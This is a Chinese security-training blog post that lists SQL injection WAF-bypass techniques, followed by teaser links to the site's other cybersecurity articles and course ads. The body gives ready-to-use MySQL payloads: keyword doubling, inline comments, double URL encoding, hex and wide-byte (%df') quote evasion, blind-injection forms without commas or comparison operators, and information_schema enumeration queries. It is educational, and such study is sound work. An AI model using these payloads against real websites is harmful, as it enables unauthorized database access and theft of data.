白帽子:SQL注入WAF绕过
最后更新 :2022.03.07
SQL注入WAF绕过
1 大小写绕过
此类绕过不经常使用,但是用的时候也不能忘了它,他原理是基于SQL语句不分大小写的,但过滤只过滤其中一种。
2 替换关键字
这种情况下大小写转化无法绕过而且正则表达式会替换或删除select、union这些关键字如果只匹配一次就很容易绕过
http://www.xx.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4
3 空格绕过
payload
select/**/*/**/from/**/yz;
select%0a*%0afrom%0ayz; %0a 是回车
select(a)from(yz);
select(a)from(yz)where(a=1);
4 内联注释
有些WAF的过滤关键词像/union\sselect/g,就比如上面说的,很多时候我都是采用内联注释。更复杂的例子需要更先进的方法。比如添加了SQL关键字,我们就要进一步分离这两个词来绕过这个过滤器。
id=1/*!UnIoN*/SeLeCT
/*!select*//*!**//*!from*//*!yz*/;
5 替换关键字
这种情况下大小写转化无法绕过而且正则表达式会替换或删除select、union这些关键字如果只匹配一次就很容易绕过
SELselectECT 1,2,3,4
6 URL编码
有时后台界面会再次URL解码所以这时可以利用二次编码解决问题
后台语句
$insert=$link->query(urldecode($_GET['id']));
$row=$insert->fetch_row();
select * from yz
select * from %2579%257a
7 十六进制绕过(引号绕过)
select a from yz where b=0x32;
select * from yz where b=char(0x32);
select * from yz where b=char(0x67)+char(0x75)+char(0x65)+char(0x73)+char(0x74)
select column_name from information_schema.tables where table_name="users"
select column_name from information_schema.tables where table_name=0x7573657273
8 逗号绕过
在使用盲注的时候,需要使用到substr(),mid(),limit。这些子句方法都需要使用到逗号。对于substr()和mid()这两个方法可以使用from to的方式来解决。
substr(),mid()
mid(user() from 1 for 1)
substr(user() from 1 for 1)
select substr(user()from -1) from yz ;
select ascii(substr(user() from 1 for 1)) < 150;
同时也可以利用替换函数
select left(database(),2)>'tf';
selete * from testtable limit 2,1;
selete * from testtable limit 2 offset 1;
9 比较符(<,>)绕过
同样是在使用盲注的时候,在使用二分查找的时候需要使用到比较操作符来进行查找。如果无法使用比较操作符,那么就需要使用到greatest,strcmp来进行绕过了。
select * from users where id=1 and greatest(ascii(substr(database(),0,1)),64)=64
select strcmp(left(database(),1),0x32);#lpad('asd',2,0)
if(substr(id,1,1)in(0x41),1,3)
-- 新学习了一种骚骚的注入姿势in、between、order by
select * from yz where a in ('aaa');
select substr(a,1,1) in ('a') from yz ;
select * from yz where a between 'a' and 'b';
select * from yz where a between 0x89 and 0x90;
select * from yz union select 1,2,3 order by 1;
-- 也可以用like,根据排列顺序进行真值判断
10 注释符绕过
在注入时的注释符一般为# --当两者不能用时就不能闭合引号
这里介绍一个奇淫巧技
select 1,2,3 from yz where '1'/1=(1=1)/'1'='1'
(1=1)中就有了判断位为下面的注入打下基础
11 宽字节绕过
字节注入也是在最近的项目中发现的问题,大家都知道%df’ 被PHP转义(开启GPC、用addslashes函数,或者icov等),单引号被加上反斜杠\,变成了 %df\’,其中\的十六进制是 %5C ,那么现在%df\’ =%df%5c%27,如果程序的默认字符集是GBK等宽字节字符集,则MySQL用GBK的编码时,会认为 %df%5c 是一个宽字符,也就是縗’,也就是说:%df\’ = %df%5c%27=縗’,有了单引号就好注入了。
注:select防止用户自定义的名称和mysql保留字冲突
12 with rollup
一般结合group by使用
select 1 as test from yz group by test with rollup limit 1 offset 1;
+------+
| test |
+------+
| NULL |
+------+
13 无列名注入
给未知列名起别名
select a from (select 1,2,3aunion select * from yz)v;
14 判断列数绕过
当order by 被过滤后就可以使用into 变量来绕过
select * from yz limit 1,1 into @a,@b,@c;
mysql数据库查询语句
select database(); #查选数据库
select group_concat(schema_name) from information_schema.schemata
select schema_name from information_schema.schemata limit 0,1 #查询数据库
select table_name from information_schema.tables where table_schema=database() limit 0,1; #查询表
select column_name from information_schema.columns where table_name='users' limit 0,1; #查询列
- END -
网络安全培训哪家更靠谱?
网络安全培训哪家更靠谱?在回答这个问题之前,我还是要先强调一点:对于大部分网络小白来说,...
什么是主机安全,主机安全未来的发展方向
什么是主机安全,主机安全未来的发展方向。在讨论主机安全之前,先说说主机安全对于我国有多...
什么是安全开发工程师?
什么是安全开发工程师?安全开发工程师是网络安全大方向下网络安全建设与实施岗的一个细分...
什么是移动安全?5G将面临的安全挑战
什么是移动安全?移动安全泛指以移动化为核心,把端点安全、数据安全、业务安全融合在一起。...
汶川地震13周年祭,地震监测预警面临的三大网络安全威胁你知道吗?
当时间来到2021年5月12日,这一天,心绪将刮去覆盖在日常之上的层层琐屑,唤起那些隐藏于心的...
网络安全培训内容有哪些?
网络安全培训内容有哪些?现在大学生工作难找,究其原因无非是学历和技能受限造成的,大环境再...
2021年网络安全行业怎么样,市场空缺还大吗?
可以这么说,未来10年都将是网络安全人才就业的黄金期。咱们通过客观数据来说话:这是16年-2...
警惕!美国中情局主战网络攻击武器曝光,网络安全问题成最关键
近期,美国通过网络对全球进行监控窃密的又一主战装备曝光,这一主战装备即为美国中央情报局...
全球第二大内存和固态硬盘制造商威刚遭勒索攻击
6月9日,全球第二大存储器和存储制造商威刚(ADATA)表示,曾在5月23日遭到勒索软件攻击,此次攻击...
麦当劳系统被攻击,韩国和台湾地区的客户信息遭泄露
6月11日,麦当劳披露了一起数据泄露事件,该事件影响了其美国、韩国和台湾地区的相关员工和...
关于“黑客”你了解多少
在网络混的久了,免不了知道“黑客”两字,也免不了遭遇黑客。而黑客的身影也在网络平台中无...
网络安全培训为什么火了?
很多小伙伴在网上搜索网络安全时,会出来网络安全工程师这样一个职位,它的范围很广,只要是与...
OMIGOD 漏洞使数以千计的Azure用户面临黑客攻击
OMIGOD——微软解决了开放管理基础设施(OMI)软件代理中的四个漏洞,这些漏洞可能会使Azure用户面临攻击。 最近发布的2021年9月补丁星期二安全更新解决了开放管理基础设施(OMI)软件代理中的四个严重漏洞,这些漏洞统称为OMIGO...
哥伦比亚房产经纪公司泄露超10万名客户的信息
据网络安全公司WizCase称,包含550万个文件的超过1兆字节的数据被泄露,泄露了哥伦比亚一家房地产公司超过10万名客户的个人信息。Ata Hakçıl和他的团队在Coninsa Ramon H拥有的数据库中发现了这一漏洞,Coninsa Ramon H...
微软被16岁男孩攻击后!网络安全师遭“哄抢”,成众多企业守护神
最近,网络安全圈子又出了一件大事,黑客组织Lapsus$黑进了微软,他们声称,从微软内部的Azure D...
企业网络安全防护措施合集,你漏了吗?
我们经常看到报纸或者资讯新闻上又爆出某某公司又被黑客袭击啦,勒索多少多少的,诶盾叔只能...
什么是代码审计工程师
代码审计工程师是网络安全大方向下网络安全建设与实施岗的一个细分岗位。代码审计,顾名思...
一文带你读懂网络安全
大家好,帅帅的叔又来了,相信过了这么久,大家都知道盾叔是做什么的了,每天在后台也会收到很多...
现在企业出现网络安全问题的原因都有哪些?
近年来网络安全问题层出不穷,信息泄露、网络钓鱼、黑客攻击等问题频繁发生。 尽管有...
等保2.0涉及的Apache Tomcat中间件(下)
一、访问控制首先这里的访问控制要求,就是针对tomcat管理控制台中的用户权限,即Tomcat Man...
中小型游戏为什么容易被攻击
游戏作为最容易遭到黑客攻击行业,尤其是一些比较出名的平台,越火爆风险就更高一些。究竟为...
在暗网上分享数百万儿童色情图片的男子被判入狱27年
一名爱尔兰裔美国双重公民因在暗网上分享数百万张描绘儿童、幼儿和婴儿性虐待的图像而被判处27年美国联邦监狱。都柏林居民Eric Eoin Marques于2019年3月23日被引渡到美国,面临2013年8月8日在马里兰州提起的联邦刑事指...
网盾安全学院4.27“丰碑班”开启了!最好的服务给最可敬的人
2022年北京冬奥会开幕式上,一名中国军人凝视五星红旗激动落泪的照片,成为这场体育盛事中最...
年薪50万+,网络安全岗位太稀缺,这个比黑客更“强”的职业怎样
现如今,新冠疫情已经常态化,它对生活影响的同时,更是导致了行业的两极分化,有的开始消沉倦怠...
攻击者隐藏踪迹的5种方式
从受信任的渗透测试工具到LOLBIN(living-off-the-land binaries),攻击者正在通过滥用受信任...
如何防范社会工程学攻击
社会工程学,一种通过对受害者心理弱点、本能反应、好奇心、信任、贪婪等心理陷阱进行诸多...
网络安全工程师必用的6个渗透工具,专业工具渗透工作更好做!
渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法。同时,网络所有者根据渗透人员提供的渗透测试报告,可以清晰知晓系统中存在的安全隐患和问题。在这些过程中除了需要渗透测评师的技术还需...
当黑客遇到骗子:只能一锅端
一直以来我们听到的都是群众被电信诈骗犯骗走了多少万的消息,每当听到这样的事,心里就多了...
安卓系统自动和手机厂商及谷歌分享用户隐私数据
10月12日,英国研究人员的一项新研究揭示了安卓手机用户存在一系列隐私问题。研究人员将重点放在三星、小米、Realme和华为安卓设备,以及安卓的两个分支RiegeOS和/e/OS。研究结果表明绝大多数安卓手机不断窥探用户隐私,即...
网络安全有哪些岗位?
网络信息安全是一门涉及计算机科学、网络技术、通信技术、密码技术、信息安全技术、应用...
数据泄露的受害者们过得怎么样?财务情况、情感和身体状况
将近 30%的受害者受到多种身份凭证泄露的影响。过去,我们更多地关注着数据泄露对于企业造...
什么是系统安全需求分析师?
什么是系统安全需求分析师?系统安全需求分析师是网络安全大方向下网络安全规划与设计岗方...
网盾安全学院“国风班”来袭!汉服与科技碰撞,用侠客精神书写不一样的“网安江湖”
曾梦想仗剑走天涯很多人都有这样一段相同的经历,儿时看着武侠剧,听着那句侠之大者,为国为民...
警惕!攻击者偏爱的6大默认配置攻击“宿主”
默认配置可能会存在大量安全漏洞。为了您的网络安全,以下是6个需要慎重检查的产品和服务...
vlunhub的dc-2靶机笔记
1.官网下载任务目标:拿到4个flag.txt文件2.使用vbox虚拟机导入3.使用kali进行扫描arp-sc...
我为什么要做攻城狮而不是程序猿
我大学学的是计算机专业,大四毕业就找了个程序猿的工作。两年之后,我带着做程序猿赚的一些...
一级域名与二级域名之间的区别
什么是一级域名一级域名又称为顶级域名,顶级域名又分为两类:一是国家顶级域名,200多个国家都按照ISO3166国家代码分配了顶级域名,例如中国是cn,美国是us,日本是jp等;值得注意的是,www. http://wangdun.cn这种形式的域名并不是...
2020网络安全逆势而动
2020年,全球地缘政治冲突多发,各国经济问题凸显。全球网络空间态势日趋复杂。人工智能、区...
美保险巨头CNA Financia支付黑客4000万美元赎金,破赎金最高纪录
美国最大的保险公司之一CNA Financial在3月底向黑客支付了4000万美元(2.5亿人民币),以恢复...
16岁盗走马化腾QQ的他,后来还好吗?
“施恩与人不图报, 恩将仇报寒吾心”。很多人在做好事之前,是根本没有奢求过回报的,只是纯...
自学网络安全能找到工作吗?
自学网络安全能找到工作吗?今天收到一条私信,一名刚高校毕业的应届生咨询盾叔,说自己毕业找...
信息安全行业的现状及趋势
信息安全是指对信息系统的硬件、软件、系统中的数据及依托其开展的业务进行保护,使得它们不会由于偶然的或者恶意的原因而遭到未经授权的访问、泄露、破坏、修改、审阅、检查、记录或销毁,保证信息系统连续可靠地正常运...
干货分享 | linux系统行为新型实时监控技术
导语:主要是从系统日常行为安全的角度分享一种能满足线上部署、能够将进程或文件创建、网...
二维码骗局该如何防范?
去年就有研究人员发现了一种新的网络钓鱼活动,该活动利用二维码将受害者重定向到网络钓鱼登陆页面,有效规避了旨在阻止此类攻击的安全解决方案和控制措施。比如去年针对法国的网络钓鱼攻击背后的攻击者就是使用了二维码...
“云清洗”是什么意思?云清洗服务器能防御DDOS攻击吗?
相信大家在租用服务器时可以看到不少的专业名词,之前是很少接触到的。比如“云清洗”、“云清洗服务器”。那么“云清洗”指的是什么服务呢?清洗的又是什么?是不是我们通常理解的那种清洗呢?高防服务器“云清洗”一般指的...
疫情下行业内卷,大学生就业难,网络安全却成未来10年“铁饭碗”
就业是民生之本、稳定之基、发展之要,大学生就业更是当今社会最受关注的热点话题。据教育...
HTTP3协议的安全优势与挑战
HTTP/3是超文本传输协议(HTTP)的第三个正式版本,将改善网络性能和稳定性,解决各种安全隐私问...
白帽子:聊聊安全界的那些书
感觉今年的安全书籍相对比较萧条,而那本CTF书着实火了一把,其它新出安全书籍其实不多了。...
什么是安全实施工程师
什么是安全实施工程师安全实施工程师是网络安全大方向下网络安全建设与实施岗的一个细分...
重磅 | 【 2021中国白帽子调查报告】正式发布
“白帽子”是一群维护互联网秩序的安保人员。他们掌握高超的专业技能,致力于迅速识别安全...
什么是安全运维工程师
什么是安全运维工程师安全运维工程师是网络安全大方向下网络安全运行与维护岗的一个细分...
网络安全工程师如何快速入门?哪里能学到网络安全硬核知识?
网络安全前景怎么样,盾叔讲过很多次了,有不少同学专门私信盾叔,希望盾叔讲一讲网络安全工程...
Hash算法进行签名验签
Hash算法进行签名验签Hash算法哈希算法(Hash 算法,Hash 算式,散列算法,消息摘要算法) :将任意长度的二进制值映射为较短的固定长度的二进制值,这个小的二进制值称为哈希值。性质...
黑客以800美元的价格出售5000万条莫斯科司机数据记录
据bleepingcomputer网站报道,黑客正在某地下论坛出售一个包含5000万条莫斯科司机数据记录的数据库,售价800美元。据购买该数据库的俄罗斯媒体称,他们购买了一小部分样本,显示数据所示年份在 2006 年至 2019 年之间,某些内...
等保2.0涉及的PostgreSQL数据库(上)
登录数据库一般用户在pgsql服务器上会创建相应的postgres用户,我们切换到postgres用户来...
什么是数据安全?数据安全因素有哪些
2021年6月10日,第十三届全国人民代表大会常务委员会第二十九次会议通过《中华人民共和国...
撕葱大众点评遭盗绑的原因是它!
首先,我们来看这个概念:撞库。撞库是黑客通过收集互联网已泄露的用户和密码信息,生成对应的...
教育部:网络安全等16个领域纳入国家安全教育 大中小学全覆盖
从教育部获悉,为深入学习贯彻习近平总书记总体国家安全观,结合教育系统实际,教育部2020年9...
2022年网络安全培训火了,缺口达95%,揭开网络安全岗位神秘面纱
微软被黑客攻击泄露源代码、巴西国库遭勒索软件攻击、伊朗遭受网络攻击导致全国加油站大...
零基础网络安全好学吗
零基础网络安全好学吗?这个问题其实很宽泛,网络安全零基础好不好学取决于很多因素,首先是自...
从特斯拉看自动驾驶与国家网络安全
4月19日上海车展,河南安阳的女车主冲上了车顶控诉所购买的特斯拉汽车存在“刹车失灵”问...
应急响应、应急响应事件、网络应急响应
一、应急响应1、什么是应急响应应急响应( Incident Response/ Emergency Response )通常是指一个组织为了应对各种意外事件的发生所做的准备工作以及在突发事件发生时或者发生后所采取的措施。计算机网络应急响应的对...
遭遇勒索软件攻击该怎么办?
勒索软件已被许多人视为组织面临的最具威胁性的网络安全风险,2019年,超过50%的企业受到勒索软件攻击,估计损失了115亿美元。仅在去年12月,包括佳能、Garmin、柯尼卡美能达和嘉年华在内的主要消费者公司就成为主要勒索软件...
等保2.0涉及的PostgreSQL数据库(中)
应对登录的用户分配账户和权限针对这个测评项,首先我们要搞清楚postgresql数据库的相应权...
Linux服务器被入侵后,我们该如何排查隐患
看了看前几天的内容,发现有几天没有给大家整点干货了,正寻思着给大家整点啥,冥思苦相不得解...
从美国某管道运营商被勒索事件浅谈安全行业
近日,美国最大的成品油管道运营商Colonial公司的网络遭到黑客攻击,被迫关闭了长达5500英里...
浓情腊八,倾囊相送:5天速成白帽子黑客9.9领取
5天速成白帽子黑客课程大纲:一、网络安全入坑指南;二、网络安全发展史;三、TCP/IP协议栈;四...
远程控制:如何用欺骗技术操纵攻击者的行动
当我们听说网络安全事件时,大部分情况下攻击者已经控制了局面——也许他们已经入侵了一家...
武汉网络安全培训:至少已有7家新冠疫苗生产商遭到黑客攻击!
微软最近表示,它已检测到三个政府资助的黑客行动(也称为APT),并且已对参与研究和治疗新冠疫苗的至少七家知名公司发起了网络攻击。“最近几个月,我们发现了来自三个民族国家行为者的网络攻击。这些攻击针对的是直接参与新...
免费SSL证书与收费SSL证书有什么区别?
随着SSL证书的普及,提供免费SSL的CA机构已经开始出现,并且越来越多的CA机构提供了自己的免费SSL证书来吸引用户,但是许多人不可避免地会遇到这样的疑问:免费SSL证书和付费SSL证书之间的区别?既然有免费SSL证书,为什么我应...
联合国承认4月曾被黑客入侵,大量数据被盗
今年4月,联合国曾遭遇网络攻击,攻击者盗取了大量数据,这些数据可能被用来攻击联合国。黑客...
一推开门:怎么全是警察?!
去年,你在暗网上骂了一个墨西哥黑客。这个墨西哥黑客十分生气,想渗透你的电脑,结果发现你的...
老师嘴里必考的网络安全知识点
大家好,盾叔今天又来给大家做干货分享咯,要是大家想了解哪些方面的知识技巧,可以在评论或者...
靶机渗透之Me And My GirlFrends
靶机渗透之Me And My GirlFrends官网下载:http://www.vulnhub.com/entry/me-and-my-girl...
等保2.0涉及的Apache Tomcat中间件(上)
这里就谈谈等保2.0要求,对应到Apache Tomcat中间件的一些条款要求。安装步骤略过,我们直接...
2021年暗网指数报告发布 ;油管事件的源头是密码泄露
全球动态1. 2021年暗网指数报告发布:信息窃取为主要目的PrivacyAffairs 发布了 2021 年暗...
什么是物联网安全?物联网安全问题有哪些
物联网的概念广义物联网:物联网是一个未来发展的愿景,等同于未来的互联网,能够实现人在任何...
网络勒索再创新高!!你的犹豫只会给人可乘之机
哈喽,我是你们帅帅的盾叔,不知道大家听说了没。计算机巨头宏碁遭到了大牌黑客组织REvil的...
硬干货:下面这些运维工程师Linux指令你都知道吗?(一)
大家好啊,今天盾叔又来给大家科普内容了!什么?说我水文章,不可能!看来是得给你们点颜色看看,不...
学网络安全为什么培训好?
学网络安全为什么培训好?根据最新版网络安全产业人才发展报告指出,在疫情常态化后,国内经济...
技术小白该如何学习网络安全
首先我们说说什么是网络安全?网络安全是指网络系统的硬件、软件及其系统中的数据受到保护...
认识Linux操作系统
任务一 查找Linux系统的基本概况第一步:通过搜索引擎搜索”Linux“Linux是一套免费使用和自由传播的类Unix操作系统,是一个基于POSIX和UNIX的多用户、多任务、支持多线程和多CPU的操作系统。它能运行主要的UNIX工具软...
网络钓鱼:工作场所保护电子邮件安全的五个步骤
近年来,商业邮件欺诈 (Business Email Compromise, BEC)攻击在流行性和创新性方面都得到...
自学黑客要多久?为什么我选择了网盾?
首先,盾叔必须站在学习者的角度来看,如果你是一个已经学过编程,通晓几门语言的人那么这个答...
网络安全培训出来为什么好找工作?
盾叔最近看到一个问题,问网络安全培训出来为什么好找工作?在解释这个问题之前,我们应该先要...
伊朗网络攻击事件背后黑手——Indra
大家还记得伊朗2021年7月9日和10日,伊朗铁路道路与城市发展系统部被黑客攻击的事情吗?当时...
两成网民遭隐私危机,信息泄露成灾,将网络安全培训推向行业风口
中国信息通信研究院日前发布的《中国信息消费发展态势报告》显示,在消费群体方面,我国网民...
什么是DDoS攻击?
DDoS攻击的定义分布式拒绝服务攻击(英文意思是Distributed Denial of Service,简称DDoS)是...
网络安全为什么越来越重要了?
前几天,我在阅读《2020中国网络安全企业100强报告》时,看到了这样三句话:未来十年,中国网络...
苹果被黑客“下套”,大量用户数据遭泄露,公司成网络安全受害者
美国彭博社30日援引三位知情人士的话报道称,苹果公司以及脸书(Facebook)母公司Meta去年将用...
如何30天零基础入门网络安全?自学网络安全有哪些缺点?
网络安全的前景如何,盾叔已经说过很多遍了,今天专题是替一些想入门网络安全,但还迷茫不知所...
你在看视频,黑客在窃取你的信用卡信息
在近日发生的一件信息窃取事件中,Palo Alto Networks Unit42安全团队发现,黑客正在通过云...
都2022年了,还不知道网络安全职业方向?气得盾叔都快脑血栓了
2022年已过去3个月,马上又该迎来一年一度的毕业实习了,盾叔记得自己当年实习就是4月份开始...
美国电信巨头遭殃!遭黑客入侵窃取源代码,网络安全威胁不断
4月24日据外媒报道,美国电信巨头T-Mobile在近期遭到黑客组织Lapsus$袭击,源代码被窃取。T-...
VBA清除技术可逃避杀毒软件的检测
VBA清除技术利用VBA的恶意MS Office文档将其VBA代码存储在“复合文件二进制格式”文...
什么是ping指令,它的作用是什么?
大家好,我是你们博学的盾叔,今天呢,来给你们上点干货,我们一起来看看ping指令到底是什么,它又...
毕业旅行的夏天怎么过,来湖北武汉找网盾来学习网络安全吧!
我刚大学毕业,想好好安排一下自己的毕业旅行。于是兴高采烈开始搜索“2021年暑假去哪儿玩...
黑客追款是真的吗?
因为经常有人在知乎上问我能不能把他被骗的钱追回来,有时候私信都解释不清楚。。。所以写了这篇文章问题一:黑客真的是黑客吗?无论是被骗钱了,还是网赌输了。如果想要黑客帮忙追款,那么你应该从什么地方找黑客呢?我们来猜猜...
网络安全培训机构排名
一提到网络安全培训机构,总会有一部分人跳出来说这一行培训劝退,建议自学。盾叔经过分析后...
入门网络安全工程师要学什么
根据最新版网络安全产业人才发展报告发布的信息得到的结论:1、疫情常态化后,国内经济回温,...
- 数据加载中,请稍后...